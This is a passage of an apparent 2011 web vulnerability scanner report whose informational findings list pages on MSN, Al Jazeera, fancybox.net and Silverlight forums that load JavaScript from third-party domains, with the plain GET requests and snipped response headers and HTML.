Set-Cookie: X-Mapping-nollkmcj=4EAA623C76FDF55310FACF40BC17B580; path=/
Content-Length: 50113

<!DOCTYPE HTML>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>EarthSky.org - A Clear Voice for Science</title>

<link rel='stylesheet' id='pret
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js?ver=2.9.2'></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.56. http://editorial.autos.redacted/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://autos.msn.us.intellitxt.com/ast/js/msn/autos.msn_cs.js
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /article.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:08 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=809818d765004928b3863b73ae1a7281; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1E98BFEFC7AD4A61B8576A26797B1A16; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:08 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
</div>..<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://autos.msn.us.intellitxt.com/ast/js/msn/autos.msn_cs.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...

23.57. http://editorial.autos.redacted/slideshow.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/slideshow.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://autos.msn.us.intellitxt.com/ast/js/msn/autos.msn_cs.js
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /slideshow.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:09 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=7b4a758c71c84b67bd5ca4184af69515; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=EE184531720E4743A15DC3BBC4F0985E; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:09 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 36444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://autos.msn.us.intellitxt.com/ast/js/msn/autos.msn_cs.js"></script>
...[SNIP]...

23.58. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://english.aljazeera.net
Path:	/news/middleeast/2011/01/201113085252994161.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /news/middleeast/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:46:12 GMT
Date: Sun, 30 Jan 2011 14:46:12 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
Content-Length: 58745
Content-Type: text/html
Age: 86
X-Cache: HIT from 12.120.11.63
Via: 1.1 12.120.11.63:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- googleoff:
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.59. http://entertainment.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET / HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 51392
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=77a66bfe41db42d28e4f88077be1798b; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Celebrity
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.60. http://entertainment.redacted/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET /news/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 62350
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=995146dbfad74c20970e903f13e0f1ce; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Just In Ne
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.61. http://entertainment.redacted/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/video/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js
http://img1.video.s-msn.com/v/js/MsnVideoUx_Min.js

Request

GET /video/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 26701
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=67f07d4e22dd45d1976d2b39e3c3771d; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
MSN Entert
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<td valign="top"><SCRIPT type=text/javascript src="http://img1.video.s-redacted/v/js/MsnVideoUx_Min.js"></SCRIPT>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.62. http://eurekalert.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://eurekalert.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: eurekalert.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.63. http://expression.microsoft.com/en-us/cc136530.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://expression.microsoft.com
Path:	/en-us/cc136530.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

GET /en-us/cc136530.aspx HTTP/1.1
Host: expression.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.64. http://fancybox.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fancybox.net
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET / HTTP/1.1
Host: fancybox.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:41:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 9835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
</title>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.65. http://fitbie.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.redacted
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-redacted/js/embed.js

Request

GET / HTTP/1.1
Host: fitbie.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sat, 29 Jan 2011 15:01:40 +0000
ETag: "1296313300-1"
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:46:17 GMT
Date: Sat, 29 Jan 2011 23:46:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...

23.66. http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.redacted
Path:	/eat-right/tips/stock-your-refrigerator-weight-loss

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-redacted/js/embed.js

Request

GET /eat-right/tips/stock-your-refrigerator-weight-loss HTTP/1.1
Host: fitbie.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sat, 29 Jan 2011 23:30:18 +0000
ETag: "1296343818-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42237
Expires: Sun, 30 Jan 2011 11:30:19 GMT
Date: Sat, 29 Jan 2011 23:46:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...

23.67. http://forums.silverlight.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.68. http://forums.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/adchain.html

Issue detail

The response dynamically includes the following script from another domain:

http://d2.zedo.com/jsc/d2/fo.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:22 GMT
Content-Length: 531

<html><head></head><body><body bgcolor="#FFFFFF">
<script language="JavaScript">
var zflag_ni
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

23.69. http://forums.silverlight.net/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.70. http://forums.silverlight.net/forums/13.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/13.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.71. http://forums.silverlight.net/forums/14.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/14.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.72. http://forums.silverlight.net/forums/15.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/15.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.73. http://forums.silverlight.net/forums/16.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/16.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.74. http://forums.silverlight.net/forums/17.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/17.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.75. http://forums.silverlight.net/forums/18.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/18.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.76. http://forums.silverlight.net/forums/19.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/19.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.77. http://forums.silverlight.net/forums/20.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/20.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.78. http://forums.silverlight.net/forums/21.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/21.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.79. http://forums.silverlight.net/forums/25.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/25.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.80. http://forums.silverlight.net/forums/28.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/28.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.81. http://forums.silverlight.net/forums/35.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/35.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.82. http://forums.silverlight.net/forums/46.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/46.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.83. http://forums.silverlight.net/forums/51.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/51.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.84. http://forums.silverlight.net/forums/52.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/52.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.85. http://forums.silverlight.net/forums/53.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/53.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.86. http://forums.silverlight.net/forums/56.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/56.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.87. http://forums.silverlight.net/forums/59.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/59.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.88. http://forums.silverlight.net/forums/63.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/63.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.89. http://forums.silverlight.net/forums/64.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/64.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.90. http://forums.silverlight.net/forums/65.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/65.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.91. http://forums.silverlight.net/forums/66.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/66.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.92. http://forums.silverlight.net/forums/67.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/67.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.93. http://forums.silverlight.net/forums/68.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/68.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.94. http://forums.silverlight.net/forums/TopicsNotAnswered.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/TopicsNotAnswered.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.95. http://forums.silverlight.net/forums/p/217026/518297.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217026/518297.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.96. http://forums.silverlight.net/forums/p/217498/518305.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217498/518305.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.97. http://forums.silverlight.net/forums/p/217562/518302.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217562/518302.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.98. http://forums.silverlight.net/forums/p/217667/518301.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217667/518301.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.99. http://forums.silverlight.net/forums/p/217709/518306.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217709/518306.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.100. http://forums.silverlight.net/forums/p/217710/518307.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217710/518307.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.101. http://forums.silverlight.net/forums/p/217719/518310.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217719/518310.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.102. http://forums.silverlight.net/forums/p/217724/518300.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217724/518300.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.103. http://forums.silverlight.net/forums/p/217726/518308.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217726/518308.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.104. http://forums.silverlight.net/forums/p/217727/518309.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217727/518309.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.105. http://forums.silverlight.net/forums/t/217026.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217026.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.106. http://forums.silverlight.net/forums/t/217498.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217498.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.107. http://forums.silverlight.net/forums/t/217562.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217562.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.108. http://forums.silverlight.net/forums/t/217667.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217667.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.109. http://forums.silverlight.net/forums/t/217709.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217709.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.110. http://forums.silverlight.net/forums/t/217710.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217710.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.111. http://forums.silverlight.net/forums/t/217719.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217719.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.112. http://forums.silverlight.net/forums/t/217724.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217724.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

23.113. http://forums.silverlight.net/forums/t/217726.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
